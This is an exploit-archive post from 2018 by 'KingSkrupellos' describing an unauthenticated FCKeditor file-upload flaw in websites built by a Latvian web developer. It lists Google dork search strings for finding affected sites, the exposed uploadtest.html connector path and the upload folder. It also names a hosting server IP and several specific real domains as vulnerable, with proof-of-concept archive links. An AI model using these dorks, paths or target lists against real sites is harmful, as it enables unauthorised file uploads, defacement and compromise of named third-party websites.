facebook facebook twitter rss

Developed by Rate it Services Business Solutions Mājas lapu izstrāde FCKeditor Remote File Upload Vulnerability

Author: KingSkrupellos , Published: 11-10-2018
# Exploit Title : Developed by Rate it Services Business Solutions Mājas lapu izstrāde FCKeditor Remote File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Vendor Homepage : rate.lv
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-264 [ Permissions, Privileges, and Access Controls ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018060245
# Cyberizm : cyberizm.org/cyberizm-developed-by-rateit-services-business-solutions-exploit.html

#################################################################################################

# Title : Developed by Rate Business Solutions Mājas lapu izstrāde Latvia FCKeditor Remote File Upload Vulnerability

# Google Dorks :

intext:''Developed by: RATE Business Soltuions''

intext:''Developed By: Mājas lapu izstrāde''

intext:''Developed by: RATE IT SERVICES''

# Exploit : /jscripts/editor/filemanager/connectors/uploadtest.html

# Path : /allfiles/...

#################################################################################################

# Example Vulnerable Sites :

There are 31 domains hosted on this server. => 178.16.24.19

btp.travel/jscripts/editor/filemanager/connectors/uploadtest.html => [ Proof of Concept ] => archive.is/HWzoL => archive.is/s2AaH

behold.lv/jscripts/editor/filemanager/connectors/uploadtest.html

hotelsinpl.com/jscripts/editor/filemanager/connectors/uploadtest.html

bhyper.com/jscripts/editor/filemanager/connectors/uploadtest.html

hotelsinwarsaw.eu/jscripts/editor/filemanager/connectors/uploadtest.html

gobaltic.com/jscripts/editor/filemanager/connectors/uploadtest.html

eursecure.com/jscripts/editor/filemanager/connectors/uploadtest.html

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :